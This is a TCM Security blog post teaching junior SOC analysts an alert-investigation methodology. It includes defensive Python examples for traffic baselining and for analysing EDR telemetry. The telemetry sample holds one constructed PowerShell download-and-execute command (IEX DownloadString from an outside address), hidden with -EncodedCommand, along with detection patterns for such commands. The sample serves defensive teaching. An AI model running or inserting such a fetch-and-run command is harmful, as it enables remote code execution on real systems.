Having the technical skills to monitor a network and investigate an alert is important, but methodology is how those skills are applied efficiently and consistently to keep an organization secure. If you are a junior cybersecurity analyst just getting started (or hoping to get started) in a Security Operations Center (SOC), having a structured framework for how you monitor and investigate alerts will help you validate and respond to potential threats.
Without a sound methodology, monitoring can become sloppy, investigations can become chaotic, and important details may slip through the cracks. Each organization and team will have their own way of doing things, but we will take a look at some of the core steps in most SOC methodologies to give you an idea of how an investigation into an alert will look.
* If you’re interested in practical courses and real-world certifications for SOC Analysts and other blue team pursuits, take a look at TCM’s SOC Analyst certification roadmap.
0. Develop a Baseline
Before effective investigations can take place, analysts need to understand what “normal” looks like in their environment. Two simple and powerful starting points are 1) the common network traffic and 2) the relevant logs.
Being familiar with the day-to-day network traffic will help you know which communication patterns, protocols, and services are expected in your organization, and this, in turn, allows anomalies to stand out.
Ensuring that logs are being collected across key systems (endpoints, firewalls, authentication, cloud services) provides invaluable data during an investigation and enables the formation of better-informed hypotheses. Without visibility, you are running blind.
A strong baseline forms the foundation for spotting suspicious activity.
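As an added example (not part of the original post), here is what “knowing your baseline” looks like in code: build a per-host picture of the expected services, external peers and flow sizes from a known-good period, then flag flows in a later window that fall outside it. The flow records and the internal address ranges are constructed for the example.

```python
"""
Baseline of "normal" network traffic per host, then a check of a new window
of flows against it.  Added example for this post, not TCM's code.  All flow
records are constructed, and the internal address ranges are an assumption.
"""
import ipaddress
from collections import defaultdict

# Assumed address space of the organization (an assumption for this example).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("172.16.0.0/12")]

# Constructed flow records from a known-good period:
# (src_host, dst_ip, dst_port, proto, bytes_out)
BASELINE_FLOWS = [
    ("ws-101", "10.0.0.5", 445, "tcp", 12_000),        # SMB to file server
    ("ws-101", "10.0.0.10", 53, "udp", 300),           # internal DNS
    ("ws-101", "192.0.2.44", 443, "tcp", 80_000),      # HTTPS to a SaaS provider
    ("ws-102", "10.0.0.5", 445, "tcp", 9_000),
    ("ws-102", "10.0.0.10", 53, "udp", 250),
    ("ws-102", "10.0.0.20", 443, "tcp", 40_000),       # internal web app
    ("srv-db-01", "10.0.0.10", 53, "udp", 100),
    ("srv-db-01", "10.0.0.30", 1433, "tcp", 500_000),  # replication peer
]

# Constructed flows from a later window that we want to check.
NEW_WINDOW = [
    ("ws-102", "10.0.0.5", 445, "tcp", 8_500),             # normal
    ("ws-101", "198.51.100.7", 4444, "tcp", 2_000),        # unexpected port and peer
    ("srv-db-01", "203.0.113.9", 443, "tcp", 50_000_000),  # DB server talking out, in bulk
]


def is_internal(ip):
    """True if the address falls inside the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def build_baseline(flows):
    """Per host: the (port, proto) services used, external peers seen, largest flow."""
    base = defaultdict(lambda: {"services": set(), "external": set(), "max_bytes": 0})
    for host, dst, port, proto, nbytes in flows:
        entry = base[host]
        entry["services"].add((port, proto))
        if not is_internal(dst):
            entry["external"].add(dst)
        entry["max_bytes"] = max(entry["max_bytes"], nbytes)
    return dict(base)


def find_anomalies(baseline, flows, volume_factor=5):
    """Return (host, reason, detail) for every flow that departs from the baseline."""
    findings = []
    for host, dst, port, proto, nbytes in flows:
        entry = baseline.get(host)
        if entry is None:
            findings.append((host, "unknown host", "no baseline for this host"))
            continue
        if (port, proto) not in entry["services"]:
            findings.append((host, "new service", f"{proto}/{port} to {dst}"))
        if not is_internal(dst) and dst not in entry["external"]:
            findings.append((host, "new external destination", dst))
        if nbytes > volume_factor * entry["max_bytes"]:
            findings.append((host, "volume spike",
                             f"{nbytes} bytes vs baseline max {entry['max_bytes']}"))
    return findings


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_FLOWS)
    for host, reason, detail in find_anomalies(baseline, NEW_WINDOW):
        print(f"{host:10} {reason:26} {detail}")
```

In practice the baseline comes from weeks of firewall, NetFlow or proxy logs rather than eight records, and thresholds like the volume factor need tuning per class of host. The point is the contrast: without the baseline, the ws-101 connection to port 4444 is just another TCP flow; with it, the host has never used that port or talked to that address, and it stands out immediately.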
1. Triaging Alerts
Alerts are the starting point for most SOC investigations, but not every alert is worth the same level of attention. Determine the severity and priority of an alert by evaluating the potential business impact (“Is this affecting a production server or a low-priority workstation?”) alongside how much you trust the detection that fired.
How quickly you uncover what happened and what was affected, and how much time you lose wading through noise, depends largely on how well your alerts are tuned. A rule that fires repeatedly on the same benign activity is a signal to fix the rule, not to keep closing the alert.
2. Investigation and Hypothesis
Once an alert passes triage, the real investigation begins. Analysts start by asking structured questions:
- Who is the user or system involved?
- What event took place?
- When did it happen, and has it happened before?
- Where did it come from?
During this process, analysts identify any Indicators of Compromise (IoCs) and often map activity against structured models, such as MITRE ATT&CK, to better understand possible adversary tactics. This step involves building hypotheses, or plausible explanations of what’s happening.
3. Collecting Evidence
Evidence collection turns suspicion into fact by gathering logs, process trees, or network artifacts, and then digging deeper.
A very useful (and rightfully meme’d) sidekick in the SOC analyst’s toolkit is a threat database such as VirusTotal. Analysts become very familiar with such tools, using them to search file hashes, IPs, and domains against known malicious activity. Search by hash before you consider uploading a file: anything submitted to VirusTotal is shared with other users and vendors, so a sensitive internal document, or a sample the attacker may be watching for, should not be uploaded. Treat a lookup as one data point, and cross-validate it with other logs, threat intel feeds, or historical data before calling it a verdict.
Sandbox testing, detonating a suspected file in a controlled and isolated environment, is another option. It can show what a malicious file actually does (files dropped, processes spawned, addresses contacted) and help confirm with a high degree of confidence whether the activity is benign or malicious. Take great care when handling potentially malicious files even when a sandbox is available: never open them on your own workstation, and keep in mind that some malware checks for a sandbox and stays quiet, so a clean detonation report does not on its own prove a file is safe.
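The questions in step 2 and the cross-validation in step 3 can be worked through on telemetry in a repeatable way. As an added example (not TCM’s code and not from the original post), the script below takes a constructed EDR-style alert, answers who/what/when/where, checks whether the same image or command line has been seen before, extracts IoCs including the payload of a decoded PowerShell -EncodedCommand, checks them against a local stand-in for a VirusTotal or threat-feed lookup, and maps the process activity to MITRE ATT&CK technique IDs. The events, hashes, addresses and the INTEL set are constructed for the example; the ATT&CK technique IDs are real.

```python
"""
Structured investigation over constructed EDR-style telemetry: who/what/when/
where, prior occurrences, IoC extraction (with -EncodedCommand decoding), an
offline threat-intel cross-check and MITRE ATT&CK mapping.
Added example for this post, not TCM's code.  Events, hashes, IPs and INTEL
are constructed; the ATT&CK technique IDs are real.
"""
import base64
import ipaddress
import re
from datetime import datetime

INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]  # assumed org address space

# PowerShell -EncodedCommand is base64 of a UTF-16LE string; build the sample that way.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

EVENTS = [  # constructed telemetry, oldest first; id 3 is the alert under investigation
    {"id": 1, "ts": "2024-03-01T09:15:00Z", "host": "ws-205", "user": "asmith",
     "event": "process_create", "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
     "sha256": "b1" * 32},
    {"id": 2, "ts": "2024-03-04T08:01:12Z", "host": "ws-101", "user": "jdoe",
     "event": "logon", "src_ip": "10.0.0.77"},
    {"id": 3, "ts": "2024-03-04T08:04:02Z", "host": "ws-101", "user": "jdoe",
     "event": "process_create", "image": PS,
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENC}", "sha256": "b1" * 32},
    {"id": 4, "ts": "2024-03-04T08:04:05Z", "host": "ws-101", "user": "jdoe",
     "event": "network_connect", "image": PS, "dst_ip": "198.51.100.7", "dst_port": 80},
    {"id": 5, "ts": "2024-03-04T08:04:09Z", "host": "ws-101", "user": "jdoe",
     "event": "process_create", "image": r"C:\Windows\System32\rundll32.exe", "parent": PS,
     "cmdline": r"rundll32.exe C:\Users\jdoe\AppData\Local\Temp\upd.dll,Start",
     "sha256": "d0" * 32},
]

# Stand-in for a VirusTotal / threat-feed lookup so the example runs offline.
INTEL = {"sha256": {"d0" * 32}, "ipv4": {"198.51.100.7"}}

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)

ATTACK_RULES = [  # (predicate(event, effective cmdline), technique id, technique name)
    (lambda e, c: e["image"].lower().endswith("powershell.exe"),
     "T1059.001", "Command and Scripting Interpreter: PowerShell"),
    (lambda e, c: "downloadstring" in c.lower() or "invoke-webrequest" in c.lower(),
     "T1105", "Ingress Tool Transfer"),
    (lambda e, c: e["image"].lower().endswith("rundll32.exe"),
     "T1218.011", "System Binary Proxy Execution: Rundll32"),
    (lambda e, c: e.get("parent", "").lower().endswith(("winword.exe", "excel.exe")),
     "T1204.002", "User Execution: Malicious File"),
]


def external_ip(ip):
    """True for a valid IPv4 address outside the assumed internal ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def effective_cmdline(ev):
    """The command line with any -EncodedCommand payload decoded and appended."""
    cmd = ev.get("cmdline", "")
    m = ENC_RE.search(cmd)
    if m:
        try:
            cmd += " ;; decoded: " + base64.b64decode(m.group(1)).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            pass  # not valid base64/UTF-16LE: keep the raw line instead of failing triage
    return cmd


def investigate(alert_id, events, window_s=300):
    """Who/what/when/where for the alert, prior occurrences, and a timeline around it."""
    ev = next(e for e in events if e["id"] == alert_id)
    t0 = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
    offset = lambda e: (datetime.fromisoformat(e["ts"].replace("Z", "+00:00")) - t0).total_seconds()
    prior = [e for e in events if e["event"] == "process_create"
             and e["image"].lower() == ev["image"].lower() and offset(e) < 0]
    return {
        "who": ev["user"], "what": effective_cmdline(ev), "when": ev["ts"], "where": ev["host"],
        "origin": ev.get("parent") or ev.get("src_ip"),  # parent process or source address
        "prior_same_image": len(prior),
        "prior_same_cmdline": sum(e["cmdline"] == ev["cmdline"] for e in prior),
        "timeline": [e["id"] for e in events
                     if e["host"] == ev["host"] and abs(offset(e)) <= window_s],
    }


def extract_iocs(events):
    """File hashes, external IPv4 addresses and URLs seen in the events."""
    iocs = {"sha256": set(), "ipv4": set(), "url": set()}
    for e in events:
        if e.get("sha256"):
            iocs["sha256"].add(e["sha256"])
        text = effective_cmdline(e)
        iocs["url"].update(URL_RE.findall(text))
        ips = IPV4_RE.findall(text) + ([e["dst_ip"]] if "dst_ip" in e else [])
        iocs["ipv4"].update(ip for ip in ips if external_ip(ip))
    return iocs


def check_intel(iocs, intel=INTEL):
    """Cross-validate extracted IoCs against the (here, local) threat-intel set."""
    return {kind: sorted(iocs[kind] & intel.get(kind, set())) for kind in iocs}


def map_attack(events):
    """ATT&CK techniques suggested by the process-creation events."""
    hits = {}
    for e in events:
        if e["event"] != "process_create":
            continue
        cmd = effective_cmdline(e)
        for matches, tid, name in ATTACK_RULES:
            if matches(e, cmd):
                hits.setdefault(tid, name)
    return hits


if __name__ == "__main__":
    inv = investigate(3, EVENTS)
    related = [e for e in EVENTS if e["id"] in inv["timeline"]]
    print(inv)
    print("intel hits:", check_intel(extract_iocs(related)))
    print("ATT&CK:", map_attack(related))
```

In a real SOC the EVENTS list is your SIEM or EDR search and the INTEL lookup is the VirusTotal or feed query; the structure is the point. The output already answers each question from step 2 (jdoe, on ws-101, spawned a hidden encoded PowerShell from Word, which had not happened before), and the decoded command line hands you the hash and address to pivot on in step 3 instead of leaving them hidden inside base64.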
Check out this blog post from Andrew Prince that dives into some tools that every SOC analyst should know.
4. Making A Decision
After reviewing the evidence, the analyst needs to make a call: benign or malicious. There will generally be procedures and standards in place covering next steps, how and to whom incidents are reported, and how to escalate a high-probability finding. The process usually looks like this:
Benign: Document the case, close it, and use the findings to refine detection rules if needed.
Malicious: Escalate to incident response teams for deeper handling, prepare to hand over collected evidence.
Knowing the processes of your organization can save valuable time and facilitate clear decision-making for positive and consistent outcomes across investigations.
5. (Bonus Step) Containment
This step is reserved for senior-level analysts in some organizations, but if the threat is confirmed and the severity warrants immediate action, containment begins right away. Depending on protocols and authority, a junior analyst may have some responsibilities during this process, including:
- Quarantining the affected endpoint
- Blocking malicious IPs or domains
- Disabling compromised user accounts
Speed of containment is often a decisive factor in how severe an incident becomes. The faster containment happens, the less opportunity attackers have to cause damage or establish persistence. It also carries a cost: isolating a host or disabling an account can destroy volatile evidence and tip off the attacker, which is why the call usually sits with the incident response lead. Know your role and responsibilities concerning containment procedures.
6. Documenting The Incident
Everyone’s favorite step! But really, documentation isn’t so much ‘paperwork’ as ‘critical institutional memory’. Thorough documentation makes the next investigation faster by letting previous experience do most of the work for you when a similar event occurs, which frees time for the anomalous events that could prove hazardous to the organization. There are three general parts to a well-documented event:
- What was observed?
- What actions were taken?
- What was the final outcome?
While it may take more time to fill in the details with the first few occurrences of an event, being able to easily and quickly reproduce the steps the next hundred times is easily worth the time spent.
7. Lessons Learned
Every investigation, whether a false positive or a confirmed incident, is a chance to strengthen defenses. In the case of an inconsequential event, you may have developed a method of streamlining identification and documentation for future instances. If you’ve uncovered an incident, you may have new IoCs for tighter detection rules or updates to your organization’s playbooks. Going over the event afterward can produce actionable insight and improve the ability of the SOC as a whole.
Final Thoughts
The work of a SOC analyst is greatly improved with structure. As you progress in the SOC, you will develop your own additions to this basic methodology, but having that basic structure helps ensure consistency, accuracy, and agility in defending the organization. A disciplined process not only helps catch threats faster but also builds a stronger, more resilient security posture over time.
If you want to learn more about the details of SOC methodology, how to use the tools, and what it’s actually like to do the work of a security analyst, the SOC 101 course is a 32-hour, hands-on, no-filler, on-demand class that will prepare you for the duties of a SOC analyst. If you want to prove the skills you’ve learned in the class, the Practical SOC Analyst Associate certification is a practical examination of how you handle completing real-world tasks as a security analyst.
About the Author: Josh Daniels
Josh is an avid storyteller and writer who loves learning about the behind-the-scenes of the digital world we live in. While his professional experience is in content marketing, Josh began pursuing a career in cybersecurity in 2022, gaining a Sec+ certificate along with other training from industry professionals and a lifelong-learner attitude.
When he is not writing, Josh enjoys outdoor adventures with his family, watching movies, reading, and an unofficial (unpaid) side gig as a Game Master Consultant for several friends who play table top RPGs. At TCM, Josh has found a home where his passion for storytelling and cybersecurity meet.
“Once men turned their thinking over to machines in the hope that this would set them free. But that only permitted other men with machines to enslave them.”
– Frank Herbert
About TCM Security
TCM Security is a veteran-owned, cybersecurity services and education company founded in Charlotte, NC. Our services division has the mission of protecting people, sensitive data, and systems. With decades of combined experience, thousands of hours of practice, and core values from our time in service, we use our skill set to secure your environment. The TCM Security Academy is an educational platform dedicated to providing affordable, top-notch cybersecurity training to our individual students and corporate clients including both self-paced and instructor-led online courses as well as custom training solutions. We also provide several vendor-agnostic, practical hands-on certification exams to ensure proven job-ready skills to prospective employers. Pentest Services: https://tcm-sec.com/our-services/